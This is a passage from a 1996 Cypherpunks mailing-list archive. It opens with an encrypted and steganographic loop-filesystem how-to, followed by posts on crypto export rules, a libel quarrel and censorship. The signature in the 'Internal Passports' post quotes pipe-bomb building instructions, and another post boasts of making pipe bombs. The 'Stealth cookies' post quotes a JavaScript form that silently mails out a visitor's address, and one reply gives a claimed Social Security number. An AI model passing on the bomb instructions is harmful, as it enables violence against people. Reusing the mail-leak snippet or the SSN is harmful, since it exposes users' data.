Pass phrase: (type a pass phrase here, up to 128 characters)
# mke2fs /dev/loop0
# losetup -d /dev/loop0

To use it again:
# mount /dev/fd0 /mnt -text2 -oloop,encryption=idea
Pass phrase: (type the same pass phrase)
# cd /mnt
(use the disk)
# cd /
# umount /mnt

To make a DES-encrypted filesystem in a regular file:

Decide on a filename and how big you want your encrypted filesystem to be.
Suppose you choose /root/private/rndseed as your filename, and you want
it to be 10MB (10240K).  Create it as follows:

# dd if=/dev/urandom of=/root/private/rndseed bs=1k count=10240
# losetup -e des /dev/loop0 /root/private/rndseed
Pass phrase: (type a pass phrase here, up to 128 characters)
# mke2fs /dev/loop0
# losetup -d /dev/loop0

To use it:
# mount /root/private/rndseed /mnt -text2 -oloop,encryption=des
Pass phrase: (type the same pass phrase)
# cd /mnt
(use the disk)
# cd /
# umount /mnt

There is an additional "feature" (well, _I_ think it's a feature) by
which you could mount the above filesystem on /root/private, even though
a file in that directory is being used to store the filesystem itself.
(Note of course that the encrypted file won't be visible when the
filesystem is mounted, and that only loop files don't count as "usage";
if you're _in_ that directory, or some process has any file in that
directory open, the mount won't work.)

To hide an IDEA-encrypted filesystem in the low bits of an audio file:

Let "penguin.au" be your sound file.
# losetup -e stego /dev/loop0 penguin.au
Use the low bits of each (b)yte, (s)hort, or (l)ong?
(Use lowercase letters for little-endian; uppercase for big-endian.)
b/s/l/B/S/L: [b]  (.au files store 1-byte samples, so say "b" here)
# dd if=/dev/urandom of=/dev/loop0 bs=1k seek=8
# losetup -e idea /dev/loop1 /dev/loop0
Pass phrase: (type a pass phrase here, up to 128 characters)
# mke2fs /dev/loop1
# losetup -d /dev/loop1
# losetup -d /dev/loop0

And to use it:
# losetup -e stego /dev/loop0 penguin.au
Use the low bits of each (b)yte, (s)hort, or (l)ong?
(Use lowercase letters for little-endian; uppercase for big-endian.)
b/s/l/B/S/L: [b]  (.au files store 1-byte samples, so say "b" here)
# mount /dev/loop0 /mnt -text2 -oloop,encryption=idea
Pass phrase: (type a pass phrase here, up to 128 characters)
# cd /mnt
(read secret info from files here)
# cd /
# umount /mnt
# losetup -d /dev/loop0

Note: if you don't have /dev/urandom, do this:

# cd /dev
# mknod random c 1 8
# mknod urandom c 1 9
# chown root.root random urandom
# chmod 666 random urandom

Last update: 19960806 by Ian Goldberg <ian@cypherpunks.ca>

This work derives from work by a number of people, including:
Werner Almesberger <almesber@bernina.ethz.ch>
Andries Brouwer <Andries.Brouwer@cwi.nl>
Ian Goldberg <ian@cypherpunks.ca>
Nicholas J. Leon <nicholas@binary9.net>
Theodore Ts'o <tytso@athena.mit.edu>
Eric Young <eay@psych.psy.uq.oz.au>
- -----------------8<--------------------8<----------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMgfZsEZRiTErSPb1AQGf9wP8Cu0h79vowZVME3dJGhCQM8AbelCOHEck
O51uZ6o5Fwv3mPsZ0E15IyYns1mLYT4slWQ2VY2vEoTsT6pM4og+45/ZP3aRJh5i
mBgNulbRvxf/eqlmDBT6433JFrdAVAWHwGcMFTUXewHQJZ3x4WyIzvk1hHv++OGo
jn96Pbr71Qs=
=13QI
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Cortes <lspeidel@earthlink.net>
Date: Wed, 7 Aug 1996 12:13:28 +0800
To: CYPHERPUNKS@toad.com
Subject: THE WORLD IS SCREWD UP
Message-ID: <3207C10E.60AF@earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain


THIS WORLD IS SREWED UP i hate my life so mue hobbeys makeing time pipe 
bommbs so what is this all about huh what the fuck "anti terrisiom bill" 
damn sad ok so what does  this mean FREE COUNTRY hahahaha i laugh when i 
hear that term there is no free country and we never have a wright to 
privesy u know man this sux so much....... oh and to the government u can 
kiss my ass




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hallam-Baker <hallam@ai.mit.edu>
Date: Wed, 7 Aug 1996 08:59:25 +0800
To: cypherpunks@toad.com
Subject: Re: Stop the presses -- Anti-terrorism bill not that bad
In-Reply-To: <4u6v5o$gt@life.ai.mit.edu>
Message-ID: <3207B8DD.794B@ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Alan Horowitz wrote:

>   I have added you to my computerized list of individuals who advocate
> the violent overthrow of the US Constitution.
> 
> I am going to go to the law library and see what my options are, with
> respect to filing a petition to have you deported out of the United
> States.
> 
> This is not a rhetorical statement.

First off Alan posted private mail to the list. In this case mail
that was more than simply personal. 

Secondly unless Alan withdraws his allegations I will bring proceedings
against him for libel. While I accept his right to free speech I do
not accept that he has a right to attempt to restrict mine with his
threats of deportation. 


	Phill Hallam-Baker




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Wed, 7 Aug 1996 15:39:53 +0800
To: cypherpunks@toad.com
Subject: CRN on Crypto Roadblock
Message-ID: <199608061732.RAA18656@pipe5.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Computer Reseller News, 8-05-96, p. 51 
 
   Channel feels pinch of export limitations -- VARs Hit 
   Encryption Roadblock 
 
   By Charlotte Dunlap & Deborah Gage 
 
 
   Could 40 bits of code cost you that multimillion-dollar 
   bid? 
 
   Andrew Sheppard, president of Branford, Conn.-based Espion 
   Inc., just returned from a frustrating business trip to 
   Europe, where he said he lost a number of accounts with 
   financial institutions because he could not deliver 
   software with more than 40 bits of encryption key length. 
 
   Sheppard, who recently tried to sell his encryption wares 
   to clients in Europe, said he lost business to competitors 
   offering stronger encryption. 
 
   "There is a real demand for this type of product, and yet 
   I find myself thwarted at every single opportunity by this 
   stupid law, which everyone realizes is unnecessary," 
   Sheppard said. 
 
   Sheppard said potential clients that turned him down during 
   his recent trip included Banco Santander, a Madrid-based 
   bank; the London office of Credit Suisse; Logica Systems of 
   London; and the financial reporting arm of Reuters' news 
   service in London. 
 
   As the trend toward networking-sensitive information grows, 
   woes tied to encryption export limitations are spreading to 
   the VAR community. The dilemma of shipping overseas 
   anything other than light versions of security software is 
   starting to sabotage the efforts of Internet resellers. 
 
   Because 40 bits of code is considered to be breakable by an 
   elementary hacker, major corporations with data to protect 
   are reluctant to trust U.S. technology. So, U.S. resellers 
   are being turned away while multinational corporations turn 
   to foreign technologies. 
 
   The debate between business and the U.S. government about 
   export limitations is getting increasingly heated with the 
   growth of the Internet. The Pro-Code Bill, which aims to 
   relax export restrictions, has just been introduced, and 
   prominent Silicon Valley executives are trekking to 
   Washington regularly to argue the case. Jim Bidzos, 
   president and chief executive of encryption market leader 
   RSA Data Security Inc., Redwood City, Calif., has spent a 
   lot of time in Washington. 
 
   "The big picture in terms of what's happening is all of our 
   communications and document storage is moving from paper 
   and filing cabinets to the Internet and disk drives. We 
   need crypto technology in order to protect this," he said. 
   But resellers are getting discouraged and do not see a 
   quick resolution with law makers. Meanwhile, they are 
   losing business at a staggering rate. 
 
   Norm Yamaguchi, director of sales for RSA master reseller 
   Secure Distribution Inc., said he could have tripled the 
   size of his million-dollar company this year if it were not 
   for U.S. export laws dictating a maximum 40-bit key 
   encryption length to his clients' international offices. 
 
   "To say this law is causing me problems is a massive 
   understatement," Yamaguchi said. The reseller currently is 
   in talks with Price Waterhouse to get them to standardize 
   on Oakland, Calif.-based Secure Distribution's security 
   products, but will likely lose the contract because of the 
   40-bit key length limitation. 
 
   Resellers' fear of losing business to foreign players is 
   not paranoia, either. The Business Software Alliance has 
   identified 500 encryption products that can be purchased in 
   foreign countries. Information about the stronger foreign 
   technology can be obtained easily through the Internet. 
 
   "The laws are punishing U.S. companies, and we're losing 
   business to foreign countries because they can offer the 
   same thing. The law is not holding back the flow of 
   encryption, it is just holding back U.S. companies from 
   making money," he added, calling it a "lose-lose 
   situation." 
 
   Reseller Al Hill, vice president of engineering for 
   Successful Systems Solutions, Rancho Cordova, Calif., has 
   to surrender part of his solutions services in order to 
   keep his foreign clients. 
 
   "We ship units to England, Hong Kong and Singapore, and we 
   have to downgrade the software [to 40 bits] on all of them. 
   They were rather upset but smart enough to realize they 
   could upgrade the security themselves," he said, adding 
   that he has lost business because he could not complete 
   projects himself. 
 
   "We have to make sure the APIs in the software are 
   available so people overseas can tie them into their 
   [security] applications," he said. Similarly, Dave Johnson, 
   senior account manager of Precision Computers Inc., 
   Portland, Ore., said he lost an account with a 
   multinational company with offices in France because "it 
   became too troublesome for them to implement U.S. products 
   because of the legal problems." 
 
   Uncle Sam's View 
 
   U.S. companies and civil libertarians have been battling 
   the government since 1991, when the proposal of the Clipper 
   Chip first surfaced. At that time, the government proposed 
   splitting the encryption keys and holding a portion of them 
   in escrow, giving law enforcement officials with court 
   orders a back door through which to conduct electronic 
   surveillance. To date, the U.S. government has budged 
   little from its original idea. 
 
   The Clipper Chip idea was squelched, but the government 
   refuses to concede that strong encryption is not a munition 
   because it believes national security is at stake. In 
   recent weeks, Vice President Al Gore proposed a compromise: 
   The government would extend the types of software that 
   could be exported, perhaps to include healthcare or 
   insurance instead of just finance, and allow long keys if 
   countries where the United States has government-to- 
   government agreements could hold keys in escrow. A 
   24-member technical advisory committee is expected to 
   produce a blueprint for establishing the Federal Key 
   Management Infrastructure in September. 
 
   The Vendor's View 
 
   Software executives remain disgruntled with the 
   government's progress. "Do we really want government- 
   to-government agreements?" asked Eric Schmidt, Sun 
   Microsystems Inc.'s Chief Technology Officer. "The U.S. has 
   protections that other countries don't. France, for 
   example, is noted for industrial espionage." 
 
   Microsoft Corp. Senior Vice President Craig Mundie said an 
   escrow system would create an expensive bureaucracy, 
   adding: "This should really be described as a key-leasing 
   system. This will create a huge new business in extracting 
   keys from the public. If you want to make sure that your 
   key is not compromised by law enforcement officials, you're 
   going to need insurance. There will be a whole service 
   industry around keys." 
 
   Vendors also argue that the government's reasoning is not 
   legitimate. "The current controls do not keep encryption 
   out of the hands of the criminals. They keep it out of the 
   hands of individuals and corporations," said Sybase Inc. 
   Director of Data and Communications Security Development 
   Thomas Parenty. 
 
   Sun, Microsoft and other companies would like complete 
   deregulation of encryption. Three bills that would lift 
   government restrictions and prohibit mandatory key escrow 
   are working their way through Congress, although none are 
   likely to pass this year. 
 
   NEXT WEEK: Measuring the level of difficulty in cracking 
   code. 
 
   [End] 
 
   Thanks to LG. 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 7 Aug 1996 12:23:48 +0800
To: "John F. Fricker" <jfricker@vertexgroup.com>
Subject: Re: Stealth cookies
In-Reply-To: <2.2.32.19960806171618.00a52aec@vertexgroup.com>
Message-ID: <3207E80C.79D1@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


John F. Fricker wrote:
> Oh I was just being paranoid I guess. There used to be JavaScript that would
> automatically send email from a page. something like
> 
> <html>
> <body onLoad="document.mailme.submit()">
> <form method=post name="mailme"
> action="mailto:john@vertexgroup.com?subject=user address">
> <input type=hidden name="userAddress" value="done">
> </form>
> </body>
> </html>
> 
> But even if that still works it would be a good trick to associate it with a
> cookie.

  This was a bug that existed for a short time, and was fixed about
6 months ago.  Javascript can not submit mailto: forms at all, and
all mailto: forms now cause a warning dialog to come up(the dialog
can be turned off in preferences).

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Wed, 7 Aug 1996 13:15:13 +0800
To: hallam@Etna.ai.mit.edu
Subject: Re: Stop the presses -- Anti-terrorism bill not that bad
In-Reply-To: <9608062338.AA01808@Etna.ai.mit.edu>
Message-ID: <Pine.SUN.3.91.960806175813.20074A-100000@crl4.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

When I wrote:

> >One of the ways UK and US laws differ is in regard to defamation.
> >In the US, truth is a defense.  In the UK it is not.  Phill may
> >have a tough time prevailing with such a suit.        ^^^^^^^^^
   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^  
> >[emphasis added]
           
Phill responded:

> In the first place cypherpunks is distributed in the UK. That
> means I can issue a writ in the UK. 

And that plus 75 cents will get you coffee.  Unless Alan is in
the UK, its repressive laws are of little consequence.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 7 Aug 1996 18:16:49 +0800
To: cypherpunks@toad.com
Subject: Re: Censorship through proxy
Message-ID: <ae2d3ca1160210042150@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:23 PM 8/6/96, Joel McNamara wrote:
>SingNet, one of Singapore's larger ISPs is telling all of their subscribers
>they must move to using SingNet's proxy server by September 14, 1996 if they
>want to have access to the Web.
>
>If you try to access one of the SBA's banned sites, you'll get a message
>that says, "The site you requested is not accessible."
>
>Check out:
>
>http://www.singnet.com.sg/cache/sbareg.html

Sing Sing (the country is now a prison, so...) is one of the states we
should think about targetting for "special attention." Not in the sense of
violence, but in the sense of offering help to freedom fighters, those who
want to use stego, web proxies, etc.

I wonder what would happen if "Computers, Freedom, and Privacy '98" was
held in Sing Sing?

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 7 Aug 1996 19:24:34 +0800
To: tcmay@got.net
Subject: Re: e$: Watching the MacRubble Bounce
Message-ID: <01I7YR8ENYFK9JD1RF@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	If you're wanting someone to talk on NuPrometheus, you might try
Barlow.... he's already been investigated for it and doesn't seem likely
to be harrassed again. Of course, _getting_ him could be a problem.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 7 Aug 1996 15:32:16 +0800
To: cypherpunks@toad.com
Subject: Re: Internal Passports
Message-ID: <ae2d3dde170210046be8@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:06 AM 8/6/96, Duncan Frissell wrote:
>At 07:37 PM 8/5/96 -0700, Timothy C. May wrote:
>
>>But the law says, these days, that I must verify the
>>legality of workers *if* they appear to be dark-skinned, Mexican, Latin, or
>>the like. I say "if" because there are no requirements in general for
...
>Naughty naughty Tim.  You're violating the Immigration Control and
>Nationality Act of 1986.  You are supposed to check all employee's IDs even
>your own childrens' and fill out that I-9 form.  You have to verify identity
>and right to work using a menu of documents ranging from passports and SS
>cards to Driver's licenses and "American Indian Tribal Documents" (I gotta
>get me some of them).  And there are special provisions to punish
>discrimination against those who appear foreign.  After all, there are loads
>of illegal Canadians and Irish here.  People are always coming from the
>third world counties.  <G>
>
>The law also required that a commission study whether or not the "foreign
>appearing" were suffering discrimination because of the law and it reported
>a few years later that sure enough, they were.

On this last point, hardly surprising. After all, the "punishment" (risk,
cost) for not checking an obviously-Caucasoid person of apparent American
origins is effectively zero, while the punishment for hiring a Mexican who
may have slipped over the border and gotten a forged credential is high.
(Employers here in California have been penalized for hiring Mexicans whose
credentials turned out to be phony...I guess the employer was supposed to
have known this by some sort of ESP.) Simpler to avoid hiring Mexicans and
other dusky folks.

The law of unintended consequences...

BTW, I am _not_ a supporter of the Prop. 187 issue in California. Nor do I
in any way support the "deputization" of employers as agents of the
Immigration and Naturalization Service. This is comparable to deputizing
employers as agents of the Drug Enforcement Agency...though many companies
have bowed to pressure from the narcs and "D.A.R.E." lobby and have
drug-testing programs, they are not (yet) required by law to test all
employees, except in some particular job funcitons, etc.

As far as I am concerned, this country has never moved toward the general
concept of a "work permit" (permission by the government to get a job), and
it is a real danger of this anti-illegal-immigrant hysteria that we will
soon see the effective equivalent of "work permits." This will of course
give the authorities even more power.

We're getting closer and closer to the world of "The Shockwave Rider."

--Nicky Halflinger

HOW TO MAKE A PIPE BOMB:
"Buy a section of metal water pipe 1/2 by 6 inches long, threaded on both
ends.  Buy two metal caps to fit.  These are standard items in hardware
stores.  Drill a 1/16th hole in the center of the pipe. This is easy with a
good drill bit. Hanson is a good brand to use.  Screw a metal cap tightly
on one end. Fill the pipe to within 1/2 inch of the top with black powder.
Do not pack the powder. Don't even tap the bottom of the pipe to make it
settle.  You want the powder loose.  For maximum explosive effect, you need
dry, fine powder sitting loose in a very rigid container." (more
information at http://sdcc13.ucsd.edu/~m1lopez/pipe.html, or by using
search engines)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Wed, 7 Aug 1996 21:31:31 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: THAT BRIT AGAIN
Message-ID: <Pine.SUN.3.91.960806182429.21834B-100000@crl4.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

Phillll came up with an excellent weasel this time.  He's offered
to "bet" on the Foresight Exchange.  The relevant part of their
FAQ says:

	How is FX different from a bookie?
          Besides the obvious fact that FX isn't real money,
	  it differs from placing bets with a bookie in that FX
          is a market.

In other words, it really isn't a bet at all.

Instead of putting his money where his mouth is, Phillll has
decided to put his mouth where his mouth is once again.  Nice
try guy.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@amanda.dorsai.org>
Date: Wed, 7 Aug 1996 21:45:52 +0800
To: Steve Reid <steve@edmweb.com>
Subject: Re: "lite" version of cpunks available?
In-Reply-To: <Pine.BSF.3.91.960805181131.186A-100000@bitbucket.edmweb.com>
Message-ID: <Pine.SUN.3.91.960806190453.7806A-100000@amanda>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 5 Aug 1996, Steve Reid wrote:

> Are there any filtered versions of the Cypherpunks mailing list available? 
> I'm currently subscribed to cypherpunks-d@gateway.com, but that machine is
> down and I haven't received anything in the past few days. 

Um, I saw that you attempted to subscribe, however you have to put 
"fcpunx subscribe" in the SUBJECT, not the body of the message.  I'm not 
running majordomo. :)

==========================================================================
 + ^ + |  Ray Arachelian |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@dorsai.org|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| --------------- |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | Just Say "No" to|KA|law abridging the freedom of speech' |==\|/==
 + v + | Janet Reno & GAK|AK|        do you not understand?       |=======   
===================http://www.dorsai.org/~sunder/=========================
 Key Escrow Laws are the mating calls of those who'd abuse your privacy!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vinnie Moscaritolo <vinnie@webstuff.apple.com>
Date: Wed, 7 Aug 1996 20:08:59 +0800
To: cypherpunks@toad.com
Subject: Mac Crypto/ internet commerce workshop registration
Message-ID: <v03007811ae2db56cce13@[204.179.131.59]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----BY SAFEMAIL 1.0-----

Attention:

I have setup a webpage to handle registrations for the Mac Crypto/ internet
commerce workshop.

http://webtuff.apple.com/~opentpt/crypto.html

please signup and book your airlines and hotel as soon as you can.

I am still looking for presenters,  if you plan to talk, please drop
me an outline, pronto

ciao

-----BEGIN PGP SIGNATURE-----BY SAFEMAIL 1.0-----
Version: 2.6.i

iQCVAwUBMggHRfMF2+rAU+UdAQEocwQAi347wC62qlgoV0E8nL2E57beK0Uo3fjo
0ZYSYSwu0zOdF9gqGyBfM0ZEHFGh9CEiJik3JCKww4B4Pl6HVWjm9Ay1DN4IqdOo
fvanrRRJXcBi00HnyaJmjq9jIrsGoH6nZ3sxM58yaldm/6iVuKezhgBprPF0WwOr
aq9NPOZaePg=
=Zm8+
-----END PGP SIGNATURE-----




Vinnie Moscaritolo
Apple Developer Tech Support
http://www.vmeng.com/vinnie/
Fingerprint: 4FA3298150E404F2782501876EA2146A






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjn@nworks.com
Date: Wed, 7 Aug 1996 20:14:32 +0800
To: cypherpunks@toad.com
Subject: Re: SSNs (was Re: Interna
Message-ID: <TCPSMTP.16.8.6.-13.10.32.2645935021.659902@.nworks.com>
MIME-Version: 1.0
Content-Type: text/plain


 (There is a really good joke in my response. Try to figure it out.
  Be the first one on your block to realize what the numbers mean)

 
 In> Anyone know  what J. Edgar Hoover's SSN was?


 Yeah, 276-77-3737


 P.J.
 pjn@nworks.com

... Hey, Worf! I hooked Data up to a modem... Wanna see?

___ Blue Wave/QWK v2.20 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christopher Hull <nozefngr@mail.apple.com>
Date: Wed, 7 Aug 1996 19:50:54 +0800
To: <cypherpunks@toad.com>
Subject: Re: e$: Watching the MacRubble Bounce
Message-ID: <199608070210.TAA12996@scv1.apple.com>
MIME-Version: 1.0
Content-Type: text/plain


>
>I, for one, would appreciate the chance to hear Tim May present
>"crypto-anarchy" and "crypto-privacy" -- in a much more coherent fashion
>
>Vinnie is putting the "Mac Crypto" conference together in his spare
>time using "borrowed" facilities in a way that stays below Apple's
>"radar horizon".

Ah, so I'm not the only one who makes nefarious use of R&D4 
(Burning Man, Mike Jittlov, and other pseudo-events) ;-)

Looking forward to it.

>
>As for the "Mac is dead," I'll leave that to another time and place.

The press is a little difficult to believe when they come out with 
nonsense like  "Apple is finally upgrading an aging product line".
Excuse me?  Yes, the last new Mac one could buy was the IIfx?

San Jose Mercury News, A Division of Microsoft Press.
(I wonder if I should extend the Shakespeare award beyond the net).

-Chris



..    But there *are* a million monkees on the net,
..    and I still aint seen no Shakespeare!             <me>
...
...    smtp: nozefngr@apple.com
..     page: 1.800.680.7351
..     http: http://virtual.net/Personal/nozefngr/
..     icbm: lat37*21'.lon121*5'
..
..  the kabuki project: http://remarque.berkeley.edu/kabuki/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@communities.com (Jim McCoy)
Date: Wed, 7 Aug 1996 15:03:15 +0800
To: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
Subject: Re:appropriate algorithm for application
Message-ID: <v02140b00ae2db6e5a520@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain


Cerridwyn Llewyellyn <ceridwyn@wolfenet.com> writes:
> I need an algorithm/protocol that is capable of encrypting numerous
> files with separate keys, but there also needs to be a master key
> that will be able to decrypt all of them.  Is there such a system
> that is relatively secure?  I'd prefer the system to be as secure
> as possible, but in this application, security is secondary to
> functionality.

You can get the basic functionality you require by using a regular hybrid
PKE system (pubkey encrypts symmetric session key) and encrypting the
session key with the public key of a "master key" as well.  For example,
assuming a user A and a master key C you just have the program A uses to
encrypt files operate in a manner similar to that used by PGP and other
public-key encryption systems [pubkeyA(sessionkey),IDEA(sessionkey,data)]
except in addition to the pubkeyA(sessionkey) which encrypts the random
key used to encrypt the actual data you add a masterpubkeyC(sessionkey)
section to the beginning of the file as well.  The resulting data packet
is [pubkeyA(sessionkey),masterpubkeyC(sessionkey),IDEA(sessionkey, data)]
This system is as secure as the public-key system used for encryption and
would actually be fairly easy to hack in to PGP, although the modified PGP
messages which contain the master key information would not be usable by
regular PGP.

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lyal collins <lyalc@zemail.com.au>
Date: Tue, 6 Aug 1996 18:47:40 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: Credit Cards over the internet
In-Reply-To: <Pine.SUN.3.91.960805234211.753E-100000@tipper.oit.unc.edu>
Message-ID: <3207FC8B.477E@zemail.com.au>
MIME-Version: 1.0
Content-Type: text/plain


I agree it is over engineered, possibly in the wrong directions.
There are other ways to avoid merchant never sees the cardholders card 
number, though - and a lot cheaper.
lyal
-- 
All mistakes in this message belong to me - you should not use them!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Wed, 7 Aug 1996 11:24:51 +0800
To: Christopher Blizzard <blizzard@odin.nyser.net>
Subject: Re: Internal Passports
In-Reply-To: <199608061308.JAA24021@odin.nyser.net>
Message-ID: <Pine.SV4.3.91.960806193211.6907D-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


If you want to pay _with a check_, you play by their rules.  In fact, the 
word "pay" might not completely appropriate in that transaction.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@Etna.ai.mit.edu
Date: Wed, 7 Aug 1996 22:26:20 +0800
To: Sandy Sandfort <cypherpunks@toad.com
Subject: Re: Stop the presses -- Anti-terrorism bill not that bad
In-Reply-To: <Pine.SUN.3.91.960806152235.17794B-100000@crl4.crl.com>
Message-ID: <9608062338.AA01808@Etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



>One of the ways UK and US laws differ is in regard to defamation.
>In the US, truth is a defense.  In the UK it is not.  Phill may
>have a tough time prevailing with such a suit.

In the first place cypherpunks is distributed in the UK. That
means I can issue a writ in the UK.  Secondly I deny Alan's claim
that I have contravened the US imigration laws. Since I am not
a public figure the burden of proof is upon Alan to prove his
claim.

I know an awful lot about the US libel laws after having spent
time assisting in a complicated criminal investigation during
which such a claim was made. As for the UK laws, there is 
practically no defense against a libel claim that one can
file in court. There is absolutely no basis on which to 
justify them. This is why the Singapore government uses them
as a form of censorship.


	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 7 Aug 1996 13:28:01 +0800
To: cypherpunks@toad.com
Subject: Re: Apple people on the list
Message-ID: <199608070252.TAA01351@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:15 PM 8/6/96 GMT, John Young wrote:
>I'd like to hear Tim, too, in this Big Apple. RealAudio, perhaps. 

>What would you offer to set off Tim's simmering crypto-anarcho-volcano,
>make it heard round the planet? 

A plan.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 7 Aug 1996 20:43:31 +0800
To: cypherpunks@toad.com
Subject: Re: Stop the presses -- Anti-terrorism bill not that bad
Message-ID: <2.2.32.19960806235136.0092c204@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:16 PM 8/5/96 -0400, hallam@Etna.ai.mit.edu wrote:

>Making that argument defeats your case. Irespective of the framers
>of the constitution nobody in Congress or the Administration believes
>that you have a right to take up arms against the government.

Have you checked with Helen Chenoweth (R-Idaho) or B1-Bob Dornan (R-Orange
County) about this assertion.  Not to mention our former black radical
friend from Oakland in Congress.  I bet you could find a fair number of
supporters for the concept of the "right of revolution" in Congress and
other parts of the government.  Better hunting on Usenet, of course.

When former Idaho congressman and senator Steve Syms was first running for
Congress, his slogan was "Traditionally, Americans have had three means of
preserving their freedoms.  The jury box, the ballot box and -- when those
failed -- the cartridge box."

In addition it seems to me that a certain "Mobe" leader and campus
revolutionary made it as far as the White House (or was he just spying for
the Company at the time?).  (Mobe = Student Mobilization Committee to End
the War in Vietnam)

Try not to say "no one believes X".  That statement can always be falsified
and usually with thousands of counter examples.

DCF

"Article 1 Section 1 of the Constitution of the State of Oregon - All power
is inherent in the people and it is their right to alter or abolish the
government whenever they believe it necessary or appropriate to do so."
>From memory but that's the substance of what it says.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 7 Aug 1996 21:00:56 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Internal Passports
Message-ID: <199608070259.TAA17424@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:37 PM 8/5/96 -0700, you wrote:
>Personally, I don't care. In fact, when employing gardeners and yard works
>I prefer Mexicans. But the law says, these days, that I must verify the
>legality of workers *if* they appear to be dark-skinned, Mexican, Latin, or
>the like. I say "if" because there are no requirements in general for
>white-skinned, Anglo workers....no work permits, no proofs of citizenship
>(such a document is currently lacking in the American pantheon...I, a mixed
>descendant of Mayflower colonist and Scandinavian immigrants, lack such
>"proof").

If you're _employing_ Anglos, you're currently required to disrespect their
honesty and demand proof that their papers are in order to fill out the I-9
form.
There's a list of "one from column A or one from columns B and C"
of acceptable papers, such as passports, birth certificates,
driver's licenses, US Military ID, etc., which the government uses
to determine whether they want to give you permission to hire them
and give them permission to work.  If you don't have these, 
you can join the Army, and they'll give you some papers.
I hope you weren't Un-American enough to be born at home, though -
without that government-issued birth certificate, the Army
